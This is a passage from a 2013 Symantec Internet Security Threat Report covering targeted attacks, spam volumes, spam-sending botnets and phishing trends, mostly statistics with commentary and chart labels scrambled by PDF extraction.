attacker will use numerous methods. The attackers have a very<br />
clear and specific objective, they are well-funded and wellorganized,<br />
and without the right protection in place, these<br />
threats have both the capability and the intent to achieve their<br />
desired goals.<br />
Methodology<br />
Defining what is meant by targeted attacks and APT is<br />
important in order to better understand the nature of this<br />
mounting threat and to make sure that you have invested in the<br />
right kinds of defenses for your organization.<br />
The types of organizations being targeted are often thought to<br />
be large, well-known multi-national organizations, often within<br />
particular industries, including the public sector, defense,<br />
energy, and pharmaceutical. In more recent years the scope has<br />
widened to include almost any organization, including SMBs.<br />
But what do we really mean by targeted attacks and advanced<br />
persistent threats?<br />
An attack can be considered as targeted if it is intended for<br />
a specific person or organization, typically created to evade<br />
traditional <strong>security</strong> defenses and frequently using advanced
p. 109<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MALICIOUS CODE TRENDS<br />
social engineering techniques. However, not all targeted attacks<br />
lead to an APT; for example, the Zeus banking Trojan can be<br />
targeted and will use social engineering in order to trick the<br />
recipient into activating the malware. But Zeus is not an APT.<br />
The attacker doesn’t necessarily care about who the individual<br />
recipient is; they may have been selected simply because the<br />
attacker is able to exploit information gathered about that<br />
individual, typically harvested through social networking<br />
websites.<br />
Social engineering has always been at the forefront of many of<br />
these more sophisticated types of attack. Without strong social<br />
engineering, or “head-hacking,” even the most technically<br />
sophisticated attacks are unlikely to succeed. Many socially<br />
engineered attacks are based on information harvested through<br />
social networking and social media websites. Once the attackers<br />
are able to understand their targets’ interests, hobbies, with<br />
whom they socialize, and who else may be in their networks,<br />
they are often able to construct more believable and convincing<br />
attacks.<br />
The data in this section is based on analysis of targeted email<br />
malware identified and blocked by Symantec.cloud on behalf of<br />
its customers in 2012.<br />
Figure B.10. Average Number of Targeted Email Attacks Per Day, 2012<br />
Source: Symantec.cloud<br />
250<br />
200<br />
150<br />
100<br />
50<br />
JAN<br />
FEB<br />
MAR<br />
APR<br />
MAY<br />
JUN<br />
JUL<br />
AUG<br />
Data and Commentary<br />
Malware such as Stuxnet in 2010, Duqu in 2011, and Flamer<br />
and Disttrack in 2012 show increasing levels of sophistication<br />
and danger. For example, the Disttrack malware used in the<br />
Shamoon attacks on a Saudi oil firm had the ability to wipe hard<br />
drives. 5<br />
The same techniques used by cybercriminals for industrial<br />
espionage may also be used by states and state proxies for cyber<br />
attacks and political espionage. Sophisticated attacks may<br />
be reverse-engineered and copied so that the same or similar<br />
techniques can be used in less discriminate attacks. A further<br />
risk is that malware developed for cybersabotage may spread<br />
beyond its intended target and infect other computers in a kind<br />
of collateral damage.<br />
SEP<br />
OCT<br />
NOV<br />
DEC
p. 110<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MALICIOUS CODE TRENDS<br />
Targeted attacks have become an established part of the threat<br />
landscape and safeguarding against them has become one of<br />
the main concerns of CISOs and IT managers. Targeted attacks<br />
are commonly used for the purposes of industrial espionage to<br />
gain access to the confidential information on a compromised<br />
computer system or network. They are fewer but potentially the<br />
most difficult attacks to defend against. It is difficult to attribute<br />
an attack to a specific group or a government without sufficient<br />
evidence. The motivation and the resources of the attacker<br />
sometimes hint to the possibility that the attacker could be<br />
state sponsored, but finding clear evidence is difficult. Attacks<br />
that could be state sponsored appear to be rare in comparison<br />
with regular cybercrime, though they have often gained<br />
more notoriety. They can be among the most sophisticated<br />
and damaging of these types of threats. Governments are<br />
undoubtedly devoting more resources to defensive and offensive<br />
cyberwarfare capabilities. In 2012, it was still unlikely that most<br />
businesses would encounter such an attack, and the greatest risk<br />
comes from the more prevalent targeted attacks that are created<br />
for the purposes of industrial espionage. Increasingly, SMBs are<br />
finding themselves on the frontline of these attacks as they have<br />
fewer resources to combat the threat and a successful attack here<br />
may subsequently be used as the springboard to further attacks<br />
against a larger organization to which they may be a supplier.<br />
To understand the nature of targeted attacks, Symantec collected<br />
data on over 55,000 attacks that could clearly be identified<br />
as targeted. These attacks were email-based and contained a<br />
malicious payload.<br />
We saw a 41.5 percent increase in targeted attacks with more<br />
attacks aimed at companies with fewer than 250 staff members.<br />
One possible explanation is that attackers have accelerated their<br />
use of small companies as a way to infiltrate larger organizations<br />
further up the supply chain. Attackers started using watering<br />
hole attacks, a technique where malware on infected third-party<br />
websites is used to target employees of companies who might<br />
visit those websites.<br />
The total number of attacks aimed at organizations with fewer<br />
than 2,500 employees is roughly equal to attacks aimed at<br />
organizations with greater than 2,500 employees.<br />
R&D, sales, C-level, and senior employees were the most targeted<br />
in the same order.<br />
Attackers want to capture the knowledge workers who have<br />
access to intellectual property (IP), but they don’t have to attack<br />
them directly to get the information they want.<br />
Too often organizations think that if they are not the target of a<br />
high profile attack, or if one attack has been blocked, that their<br />
troubles are over. However, our research shows that a targeted<br />
attack can go on for months. The attack will change over time,<br />
with new social engineering, new malware, and often leveraging<br />
multiple zero-day vulnerabilities. What our research does not<br />
show is attackers giving up after one attempt to breach an<br />
organization.<br />
The Characteristics of a Targeted Attack<br />
When comparing the number of targeted attacks directed at<br />
companies with 2,500 or more employees and companies with<br />
fewer than 2,500, we see an equal split.<br />
Thirty-five percent of all targeted attacks are targeted at<br />
companies with fewer than 500 employees, as illustrated in<br />
figure B.13. And despite the commonly held belief of small<br />
businesses that they would never be the victims of a targeted<br />
attack, 30.8 percent of all targeted attacks are directed at<br />
companies with up to 250 employees.
p. 111<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MALICIOUS CODE TRENDS<br />
Figure B.11. Targeted Attacks by Company Size, 2012<br />
Source: Symantec.cloud<br />
2,501+<br />
50%<br />
1-250<br />
31%<br />
Figure B.12. Targeted Attacks Against Job Function, 2012<br />
Source: Symantec.cloud<br />
Chief Exec. or Board Level<br />
PR and Marketing<br />
Personal Assistant<br />
Research and Development<br />
Human Resources<br />
Sales<br />
Senior Management<br />
Shared Mailbox<br />
info@, sales@, etc.<br />
5% 251-500<br />
3% 501-1,000<br />
2% 1,001-1,500<br />
9% 1,501-2,500<br />
2011<br />
2012<br />
% CHANGE<br />
-15% -10% -5 0 5 10 15 20 25 30%
p. 112<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MALICIOUS CODE TRENDS<br />
While 55 percent of the mailboxes targeted for attack are<br />
high-level executives, senior managers and people in R&D, the<br />
majority of targets are people that are unlikely to have such<br />
information. Why then are they targeted?<br />
As we’ve said, they provide a stepping stone to the ultimate<br />
target. And in the case of personal assistants, sales and media<br />
(public relations), they work closely with people who are the<br />
ultimate target. But just as important, these people are also easy<br />
to find and research online: email addresses for public relations<br />
people, shared mailboxes, and recruiters are commonly found on<br />
a company’s website.<br />
Additionally, these people are used to being contacted by people<br />
they do not know. And in many cases part of the job requires<br />
them to open unsolicited files from strangers. Think of how<br />
many resumes a recruiter receives each day in a document or<br />
PDF file attachment. Finally, under the illusion that targeted<br />
attacks are only aimed at high-level executives or those working<br />
with the company’s intellectual property (IP), they are less<br />
likely to have their guard up against social engineering.<br />
In Figure B.16, we can see that malicious EXEs are largely<br />
used in targeted attacks (over one-third of attacks). However,<br />
malicious DOCs and PDFs are commonly used by attackers<br />
(44.4 percent of the attacks).<br />
Looking at the break out of targeted attacks by industry,<br />
Manufacturing was the most-targeted sector in 2012, with 24.3<br />
percent of targeted attacks destined for this sector, compared<br />
with 15 percent in 2011. Attacks against government and public<br />
sector organizations fell from 25 percent in 2011, when it was<br />
the most targeted sector, to 12 percent in 2012. It’s likely the<br />
frontline attacks are moving down the supply chain, particularly<br />
for small to SMBs.<br />
Conclusion<br />
Figure B.13. Breakdown of Document Types Being Attached to Targeted Attacks, 2012<br />
Source: Symantec.cloud<br />
45%<br />
40<br />
35<br />
30<br />
25<br />
20<br />
15<br />
10<br />
5<br />
39%<br />
EXE<br />
34%<br />
DOC<br />
11%<br />
PDF<br />
5%<br />
XLS<br />
SCR<br />
BIN<br />
LNK<br />
Targeted attacks should be concern for all organization, large<br />
and small. While C-level executives and those that work with<br />
a company’s IP should be careful, everyone in an organization<br />
is at risk of being targeted. This is especially true of workers<br />
who in the course of their jobs typically receive email from<br />
people they don’t know. In the end, no matter the size or type<br />
of organization you have or your role in that organization, you<br />
are at risk and best practices must be followed to protect the<br />
organization. Don’t become the weakest link in the supply chain.<br />
2% 2% 2% 2% 1% 1%<br />
CHM<br />
DMP<br />
DLL
p. 113<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MALICIOUS CODE TRENDS<br />
Figure B.14. Analysis of Targeted Attacks by Top 10 Industry Sectors, 2012<br />
Source: Symantec.cloud<br />
Manufacturing 24%<br />
Finance, Insurance<br />
and Real Estate<br />
19%<br />
Services - Non-Traditional<br />
17%<br />
Government<br />
Energy/Utilities<br />
Services - Professional<br />
Aerospace<br />
Retail<br />
Wholesale<br />
Transportation,<br />
Communications,<br />
Electric, Gas, and Sanitary<br />
2%<br />
2%<br />
2%<br />
1%<br />
8%<br />
10%<br />
12%<br />
5% 10% 15% 20% 25% 30%
p. 114<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MALICIOUS CODE TRENDS<br />
Malicious Code Trends Endnotes<br />
01 See http://www.confickerworkinggroup.org/wiki/pmwiki.php/ANY/InfectionTracking#toc15.<br />
02 See http://www.symantec.com/<strong>security</strong>_response/writeup.jsp?docid=2010-071400-3123-99.<br />
03 CIFS is a file sharing protocol that allows files and other resources on a computer to be shared with other computers across the<br />
Internet. One or more directories on a computer can be shared to allow other computers to access the files within.<br />
04 Because malicious code samples often use more than one mechanism to propagate, cumulative percentages may exceed 100<br />
percent.<br />
05 See http://www.symantec.com/connect/blogs/shamoon-attacks.
p. 115<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
APPENDIX :: C<br />
SPAM AND FRAUD<br />
ACTIVITy TRENDS
p. 116<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
SPAM AND FRAUD ACTIVITy TRENDS<br />
Spam and Fraud Activity Trends<br />
Phishing is an attempt by a third party to solicit confidential information from an individual,<br />
group, or organization by mimicking (or spoofing) a specific, usually well-known brand.<br />
Phishers attempt to trick users into disclosing personal data, such as credit card numbers,<br />
online banking credentials, and other sensitive information, which they can then use to<br />
commit fraudulent acts. Phishing generally requires victims to provide their credentials,<br />
often by duping them into filling out an online form. This is one of the characteristics that<br />
distinguish phishing from spam-based scams (such as the widely disseminated “419 scam” 1<br />
and other social engineering scams).<br />
Spam is usually defined as junk or unsolicited email sent by a third party. While it is certainly<br />
an annoyance to users and administrators, spam is also a serious <strong>security</strong> concern because<br />
it can be used to deliver Trojans, viruses, and phishing attacks. Spam can also include URLs<br />
that link to malicious sites that, without the user being aware of it, attack a user’s system<br />
upon visitation. Large volumes of spam could also cause a loss of service or degradation in<br />
the performance of network resources and email services.<br />
This section covers phishing and spam trends. It also discusses activities observed on underground economy servers because that is<br />
where much of the profit is made from phishing and spam attacks.<br />
• Analysis of Spam Activity Trends<br />
• Analysis of Spam Activity by Geography, Industry Sector, and Company Size<br />
• Analysis of Spam Delivered by Botnets<br />
• Significant Spam Tactics<br />
• Spam by Category<br />
• Phishing Activity Trends<br />
• Analysis of Phishing Activity by Geography, Industry Sector, and Company Size
p. 117<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
SPAM AND FRAUD ACTIVITy TRENDS<br />
Analysis of Spam Activity Trends<br />
Background<br />
This section discusses the patterns and trends relating to spam<br />
message volumes and the proportion of email traffic identified<br />
as spam during 2012<br />
Methodology<br />
The analysis for this section is based on global spam and overall<br />
email volumes for 2012. Global values are determined based on<br />
the statistically representative sample provided by Symantec’s<br />
Brightmail 2 operations and spam rates include spam blocked by<br />
Symantec.cloud.<br />
Data and Commentary<br />
Figure c.1. Global Spam Volume in Circulation, 2012<br />
Source: Symantec<br />
60<br />
50<br />
40<br />
30<br />
20<br />
10<br />
0<br />
JAN<br />
BILLIONS<br />
FEB<br />
MAR<br />
APR<br />
MAY<br />
JUN<br />
Grum Botnet<br />
Takedown reduced<br />
spam activity –<br />
July 15-17.<br />
JUL<br />
AUG<br />
SEP<br />
Spam dip seen due to<br />
quiet FESTI botnet in<br />
October, but active in<br />
early September.<br />
OCT<br />
NOV<br />
DEC<br />
There were approximately<br />
30 billion spam emails in<br />
circulation worldwide each day<br />
overall in 2012, compared with<br />
42.1 billion in 2011; a decrease<br />
of 28.6 percent in global spam<br />
volume.
p. 118<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
SPAM AND FRAUD ACTIVITy TRENDS<br />
Figure c.2. Proportion of Email Traffic Identified as Spam, 2011–2012<br />
Source: Symantec.cloud<br />
90%<br />
80<br />
70<br />
60<br />
50<br />
40<br />
30<br />
20<br />
10<br />
JAN<br />
FEB<br />
MAR<br />
APR<br />
MAY<br />
JUN<br />
JUL<br />
AUG<br />
SEP<br />
OCT<br />
NOV<br />
DEC<br />
2011 2012<br />
Overall for 2012, 68.5 percent<br />
of email traffic was identified<br />
as spam, compared with 75.1<br />
percent in 2011; a decrease of<br />
6.6 percentage points.
p. 119<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
SPAM AND FRAUD ACTIVITy TRENDS<br />
Analysis of Spam Activity by Geography, Industry Sector, and Company Size<br />
Background<br />
Spam activity trends can also reveal patterns that may be<br />
associated with particular geographical locations or hotspots.<br />
This may be a consequence of social and political changes in the<br />
region, such as increased broadband penetration and increased<br />
competition in the marketplace that can drive down prices,<br />
increasing adoption rates. Of course, there may also be other<br />
factors at work based on the local economic conditions that may<br />
present different risk factors. Similarly, the industry sector may<br />
also have an influence on an organization’s risk factor, where<br />
certain industries may be exposed to different levels of threat<br />
based on the nature of their business.<br />
Moreover, the size of an organization can also play a part in<br />
determining their exposure to risk. SMBs may find themselves<br />
Data<br />
Figure c.3. Proportion of Email Traffic Identified as Spam by Industry Sector, 2012<br />
Source: Symantec.cloud<br />
Marketing/Media<br />
Manufacturing<br />
Recreation<br />
Agriculture<br />
Chem/Pharm<br />
Building/Cons<br />
Telecoms<br />
IT Services<br />
Wholesale<br />
Professional Services<br />
the target of a spam attack because SMBs are perceived to be<br />
softer targets because they are less likely to have the same levels<br />
of <strong>security</strong> countermeasures as larger organizations, which are<br />
more likely to have greater budgetary expenditure applied to<br />
their anti-spam and <strong>security</strong> countermeasures.<br />
Methodology<br />
0 10 20 30 40 50 60 70 80 90%<br />
Analysis of spam activity based on geography, industry, and<br />
size is determined from the patterns of spam activity for<br />
Symantec.cloud clients for threats during 2012.<br />
2011 2012
p. 120<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
SPAM AND FRAUD ACTIVITy TRENDS<br />
Figure c.4. Proportion of Email Traffic Identified as Spam by Organization Size, 2012<br />
Source: Symantec.cloud<br />
90%<br />
80<br />
70<br />
60<br />
50<br />
40<br />
30<br />
20<br />
15<br />
0.0<br />
1-250<br />
251-500<br />
501-1,000<br />
1,001-1,500<br />
1,501-2,500<br />
Figure c.5. Proportion of Email Traffic Identified as Spam by Geographic Location, 2012<br />
Source: Symantec.cloud<br />
Saudi Arabia<br />
Bulgaria<br />
Chile<br />
Hungary<br />
China<br />
Sri Lanka<br />
Tanzania, United<br />
Republic of<br />
Qatar<br />
Brazil<br />
Oman<br />
2,501+<br />
2011 2012<br />
10 20 30 40 50 60 70 80 90%<br />
2011 2012
p. 121<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
SPAM AND FRAUD ACTIVITy TRENDS<br />
Commentary<br />
• The spam rate has decreased across all top 10 geographies<br />
in 2012. The highest rate for spam is for organizations in<br />
Saudi Arabia, with an overall average spam rate of 79.1<br />
percent. In 2011, the highest rate was in Saudi Arabia, with<br />
an overall average spam rate of 80.9 percent.<br />
• The spam rate has decreased across all top 10 industry<br />
sectors in 2012. Organizations in the Marketing/Media<br />
sector were subjected to the highest spam rate of 69.3<br />
percent in 2012; in 2011, the automotive sector had the<br />
highest spam rate of 77.9 percent.<br />
• The spam rate has decreased for all sizes of organization in<br />
2012. 68.4 percent of emails sent to large enterprises with<br />
more than 2,500 employees in 2012 were identified as spam,<br />
compared with 75.2 percent in 2011.<br />
• 68.4 percent of emails sent to SMBs with up to 250<br />
employees in 2012 were identified as spam, compared with<br />
74.6 percent in 2011.
p. 122<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
SPAM AND FRAUD ACTIVITy TRENDS<br />
Analysis of Spam Delivered by Botnets<br />
Background<br />
This section discusses botnets and their use in the sending of<br />
spam. Like ballistics analysis in the real world can reveal the<br />
gun used to fire a bullet, botnets can similarly be identified<br />
by common features within the structure of email headers<br />
and corresponding patterns during the SMTP transactions. 3<br />
Spam emails are classified for further analysis according to the<br />
originating botnet during the SMTP transaction phase. This<br />
analysis only reviews botnets involved in sending spam and does<br />
not look at botnets used for other purposes, such as for financial<br />
fraud or DDoS attacks.<br />
Data<br />
Figure c.6. Percentage of Spam Sent from Botnets in 2012<br />
Source: Symantec.cloud<br />
90%<br />
80<br />
70<br />
60<br />
50<br />
40<br />
30<br />
20<br />
10<br />
JAN<br />
FEB<br />
MAR<br />
APR<br />
MAY<br />
JUN<br />
JUL<br />
AUG<br />
Methodology<br />
Symantec.cloud spam honeypots collected between 5–10<br />
million spam emails each day during 2011. These are classified<br />
according to a series of heuristic rules applied to the SMTP<br />
conversation and the email header information.<br />
A variety of internal and external IP reputation lists are also<br />
used in order to classify known botnet traffic based on the<br />
source IP address of the sending machine. Information is shared<br />
with other <strong>security</strong> experts to ensure data is up to date and<br />
accurate.<br />
SEP<br />
OCT<br />
NOV<br />
TREND<br />
DEC
p. 123<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
SPAM AND FRAUD ACTIVITy TRENDS<br />
Figure c.7. Analysis of Spam-sending Botnet Activity, 2012<br />
Source: Symantec.cloud<br />
Botnet Name % of Botnet Spam Est. Spam Per Day Top Sources of Spam from Botnet<br />
LetHic 43.4% 9,632,000,000 india (14%) Vietnam (6%) Poland (5%)<br />
cutWAiL 21.8% 4,838,000,000 india (15%) russia (6%) Brazil (6%)<br />
GruM 16.2% 3,585,000,000 india (18%) Vietnam (13%) Pakistan (10%)<br />
Festi 15.0% 3,331,000,000 saudi Arabia (39%) india (24%) turkey (12%)<br />
MAAZBen 1.3% 277,000,000 Brazil (12%) india (10%) united states (8%)<br />
GHeG 0.7% 149,000,000 indonesia (14%) india (12%) Vietnam (9%)<br />
KeLiHOs 0.6% 140,000,000 india (20%) Peru (14%) turkey (12%)<br />
XArVester 0.4% 90,000,000 uK (13%) italy (8%) india (7%)<br />
WALeDAc 0.2% 52,000,000 india (10%) Kazakhstan (5%) Brazil (5%)<br />
BAGLe 0.2% 48,000,000 united states (20%) china (18%) Brazil (10%)<br />
Commentary<br />
• In 2011, approximately 78.8 percent of all spam was<br />
distributed by spam-sending botnets, compared with 88.2<br />
percent in 2011, a decrease of 9.4 percentage points. This<br />
was in large part owing to the disruption of the Rustock<br />
botnet on 16 March 2011. By the end of 2011, this number<br />
rose to 81.2 percent.<br />
• In the 7 days prior to the disruption of the Rustock botnet,<br />
each day approximately 51.2 billion spam emails were in<br />
circulation worldwide. In the 7 days following, this number<br />
fell to 31.7 billion, a decrease of 38.0 percent in global spam<br />
volume.<br />
• The global spam rate during the 7 days prior to when<br />
the Rustock botnet ceasing spamming was 78.2 percent,<br />
compared with 70.0 percent in the 7 days after.<br />
• During the second half of 2011, the change in frequency of<br />
botnet spam being distributed from botnets became much<br />
more noticeable, as shown in figure C.6. Large spam runs<br />
often lasted for only two or three days and when the spam<br />
run ceased, the volume of botnet-spam fell considerably;<br />
however, when Rustock was in operation during 2010 and<br />
during the first quarter of 2011, it was almost continually<br />
sending spam at a fairly regular and steady rate.
p. 124<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
SPAM AND FRAUD ACTIVITy TRENDS<br />
Significant Spam Tactics<br />
Background<br />
This section discusses significant spam tactics used throughout<br />
2012, including the size of spam messages and the languages<br />
used in spam emails.<br />
Size of Spam Messages<br />
Figure c.8. Frequency of Spam Messages by Size, 2012<br />
Source: Symantec<br />
60%<br />
50<br />
40<br />
30<br />
20<br />
10<br />
49%<br />
100 KB<br />
• In 2012, 49 percent of spam<br />
messages were less than 5<br />
KB in size. For spammers,<br />
smaller file sizes mean more<br />
messages can be sent using<br />
the same resources.<br />
• Increased sizes are often<br />
associated with malicious<br />
activity, where email<br />
attachments contain<br />
malicious executable code.
p. 125<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
SPAM AND FRAUD ACTIVITy TRENDS<br />
Proportion of Spam Messages Containing URLs<br />
Figure c.9. Proportion of Spam Messages Containing URLs, 2012<br />
Source: Symantec<br />
100%<br />
90<br />
80<br />
70<br />
60<br />
50<br />
40<br />
30<br />
20<br />
10<br />
Top-level Domains (TLD) Identified in Spam URLs<br />
Figure c.10. Analysis of Top-level Domains Used in Spam URLs, 2012<br />
Source: Symantec<br />
70%<br />
60<br />
50<br />
40<br />
30<br />
20<br />
10<br />
82<br />
JAN<br />
63%<br />
COM<br />
77<br />
FEB<br />
78<br />
MAR<br />
8%<br />
RU<br />
84 86 86 85<br />
APR<br />
MAY<br />
5% 7% 6%<br />
INFO<br />
JUN<br />
JUL<br />
NET<br />
91<br />
AUG<br />
82<br />
SEP<br />
ORG<br />
96<br />
OCT<br />
88<br />
NOV<br />
3%<br />
BR<br />
95<br />
TREND<br />
DEC<br />
In 2012, 85.3 percent of spam<br />
messages contained at least<br />
one URL hyperlink, compared<br />
with 86.2 percent in 2011, a<br />
decrease of 0.9 percentage<br />
points.
p. 126<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
SPAM AND FRAUD ACTIVITy TRENDS<br />
Spam by Category<br />
Background<br />
Spam is created in a variety of different styles and complexities.<br />
Some spam is plain text with a URL; some is cluttered with<br />
images and/or attachments. Some comes with very little in<br />
terms of text, perhaps only a URL. And, of course, spam is<br />
distributed in a variety of different languages. It is also common<br />
for spam to contain “Bayes poison” (random text added to<br />
messages that has been haphazardly scraped from websites to<br />
“pollute” the spam with words bearing no relation to the intent<br />
of the spam message itself). Bayes poison is used to thwart spam<br />
filters that typically try to deduce spam based on a database of<br />
words that are frequently repeated in spam messages.<br />
Any automated process to classify spam into categories would<br />
need to overcome this randomness issue. For example, the<br />
word “watch” may appear in the random text included in<br />
a pharmaceutical spam message, posing a challenge as to<br />
classifying the message as pharmaceutical spam or in the<br />
watches/jewelry category. Another challenge occurs when a<br />
pharmaceutical spam contains no obvious pharmaceuticalrelated<br />
words, but only an image and a URL.<br />
Spammers attempt to get their messages through to recipients<br />
without revealing too many clues that the message is spam.<br />
Clues found in the plain text content of the email can be<br />
examined using automated anti-spam techniques. A common<br />
way to overcome automated techniques is by using random text.<br />
An equally effective way is to include very little in the way of<br />
extra text in the spam, instead including a URL in the body of<br />
the message.<br />
Spam detection services often resist classifying spam into<br />
different categories because it is difficult to do (for the reasons<br />
above) and because the purpose of spam detection is to<br />
determine whether the message is spam and to block it, rather<br />
than to identify its subject matter. The most accurate way to<br />
overcome the ambiguity faced by using automated techniques<br />
to classify spam is to have someone classify unknown spam<br />
manually. While time-consuming, this process provides much<br />
more accurate results. An analyst can read the message,<br />
understand the context of the email, view images, follow URLs,<br />
and view websites in order to gather the bigger picture around<br />
the spam message.<br />
Methodology<br />
Once per month, several thousand random spam samples are<br />
collected and classified by Symantec.cloud using a combination<br />
of electronic and human analysis into one of the following<br />
categories:<br />
• Casino/Gambling<br />
• Degrees/Diplomas<br />
• Diet/Weight Loss<br />
• Jobs/Money Mules<br />
• Malware<br />
• Mobile Phones<br />
• Pharmaceutical<br />
• Phishing<br />
• Scams/Fraud/419s<br />
• Sexual/Dating<br />
• Software<br />
• Unknown/Other<br />
• Unsolicited Newsletters<br />
• Watches/Jewelry
p. 127<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
SPAM AND FRAUD ACTIVITy TRENDS<br />
Data<br />
Figure c.11. Spam by Category, 2012<br />
Source: Symantec.cloud<br />
Category 2012 2011 Change<br />
Pharmaceutical 21.1% 39.6% -18.5%<br />
Watches/Jewelry 9.2% 18.6% -9.4%<br />
sexual/Dating 54.6% 14.7% 39.9%<br />
unsolicited newsletters 7.4% 10.1% -2.7%<br />
casino/Gambling 1.6% 7.9% -6.3%<br />
Diet/Weight Loss 1.0% 3.5% -2.5%<br />
Malware 1.9% 3.0% -1.1%<br />
unknown/Other 2.4% 2.8% -0.4%<br />
scams/Fraud/419s 0.4% 1.8% -1.4%<br />
software 2.1% 0.8% 1.3%<br />
Jobs/Money Mules 4.4% 0.5% 3.9%<br />
Degrees/Diplomas 0.3% 0.4% -0.1%<br />
Mobile Phones 0.6% 0.3% 0.4%<br />
Phishing 0.4% 0.3% 0.2%
p. 128<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
SPAM AND FRAUD ACTIVITy TRENDS<br />
Figure c.12. Spam by Category, 2012<br />
Source: Symantec.cloud<br />
Pharmaceutical<br />
Watches/Jewelry<br />
Sexual/Dating<br />
Unsolicited Newsletters<br />
Casino/Gambling<br />
Diet/Weight Loss<br />
Malware<br />
Unknown/Other<br />
Scams/Fraud/419s<br />
Software<br />
Jobs/Money Mules<br />
Degrees/Diplomas<br />
Mobile Phones<br />
Phishing<br />
Commentary<br />
0 5 10 15 20 25 30 35 40 45 50 55 60%<br />
• Adult spam dominates this year, with more than half (54.6<br />
percent) of all spam in 2012 related to adult spam, an<br />
increase of 39.9 percentage points compared with 2011.<br />
These are often email messages inviting the recipient to<br />
connect to the scammer through instant messaging, or a<br />
URL hyperlink where they are then typically invited to a<br />
pay-per-view adult-content Web cam site. Often any IM<br />
conversation would be handled by a bot responder, or a<br />
person working in a low-pay, offshore call center.<br />
• The disruption of the Grum and Festi botnet in July and<br />
October 2012 respectively had a major impact on the<br />
decline in pharmaceutical spam products.<br />
• A category with a low percentage still means millions of<br />
spam messages. Although it is difficult to be certain what<br />
the true volume of spam in circulation is at any given time,<br />
Symantec estimates that approximately 30 billion spam<br />
2011 2012<br />
emails were sent globally each day in 2012. Where some of<br />
the categories listed earlier represent 0.4 percent of spam,<br />
this figure equates to more than 120 million spam emails in<br />
a single day.<br />
• Spam in the categories Watches/Jewelry, Casino/Gambling,<br />
Unsolicited Newsletters, and Scams/Fraud all decreased.
p. 129<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
SPAM AND FRAUD ACTIVITy TRENDS<br />
Phishing Activity Trends<br />
Background<br />
This section discusses the proportion of malicious email activity<br />
that is categorized as phishing attacks and looks more closely<br />
at emerging trends, particularly social engineering techniques<br />
and how attackers can automate the use of RSS news feeds to<br />
incorporate news and current affairs stories into their scams.<br />
Data<br />
Figure c.13. Phishing Rates, 2011–2012<br />
Source:<br />
0<br />
Symantec.cloud<br />
1 in 100<br />
1 in 200<br />
1 in 300<br />
1 in 400<br />
1 in 500<br />
1 in 600<br />
JAN<br />
APR<br />
JUL<br />
OCT<br />
JAN<br />
APR<br />
Methodology<br />
The data for this section is based on the analysis of email traffic<br />
collected from Symantec.cloud global honeypots and from the<br />
analysis of malicious and unwanted email traffic data collected<br />
from customers worldwide. The analysis of phishing trends<br />
is based on emails processed by Symantec.cloud Skeptic 4<br />
technology and analysis of phishing emails collected in spam<br />
honeypots. Symantec.cloud spam honeypots collected between<br />
2–5 million spam emails each day during 2012.<br />
JUL<br />
OCT<br />
2011 2012
p. 130<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
SPAM AND FRAUD ACTIVITy TRENDS<br />
Figure c.14. Phishing Category Types, Top 200 Organizations, 2012<br />
Source: Symantec.cloud<br />
Financial<br />
69%<br />
Information<br />
Services<br />
27%<br />
Figure c.15. Tactics of Phishing Distribution, 2012<br />
Source: Symantec.cloud<br />
Automated Toolkits<br />
54%<br />
Other Unique<br />
Domains<br />
39%<br />
5% Other<br />
Computer<br />
Software<br />
34%<br />
0.2% Government<br />
4% Free Web-hosting Sites<br />
3% IP Address Domains<br />
1% Typosquatting<br />
22% Communications<br />
20% Telecom<br />
12% Retail<br />
10% Entertainment
p. 131<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
SPAM AND FRAUD ACTIVITy TRENDS<br />
Commentary<br />
• Overall for 2012, 1 in 414.3 emails was identified and<br />
blocked as a phishing attack, compared with 1 in 298.9 in<br />
2011; an decrease of 0.09 percentage points.<br />
• 67.3 percent of phishing attacks in 2012 related to spoofed<br />
financial organizations, compared with 85.2 percent in<br />
2011.<br />
• Phishing attacks on organizations in the Information<br />
Services sector accounted for 27.2 percent of phishing<br />
attacks in 2012.<br />
• Phishing URLs spoofing banks attempt to steal a wide<br />
variety of information that can be used for identity theft<br />
and fraud. Attackers seek information such as names,<br />
government-issued identification numbers, bank account<br />
information, and credit card numbers. Cybercriminals are<br />
more focused on stealing financial information that can<br />
make them large amounts of money quickly versus goods<br />
that require a larger time investment, such as scams.<br />
• Phishing schemes continued to use major events to entice<br />
recipients:<br />
One scam featured references to increased numbers<br />
of Syrian refuges in southern Turkey as a result of the<br />
ongoing struggle in Syria, stating, “But you must assure<br />
me that you will use at least 50 percent of my wealth<br />
to help the Syrian refugees in Turkey. Turkish Disaster<br />
Management Agency (AFAD) said that the Syrian refugees<br />
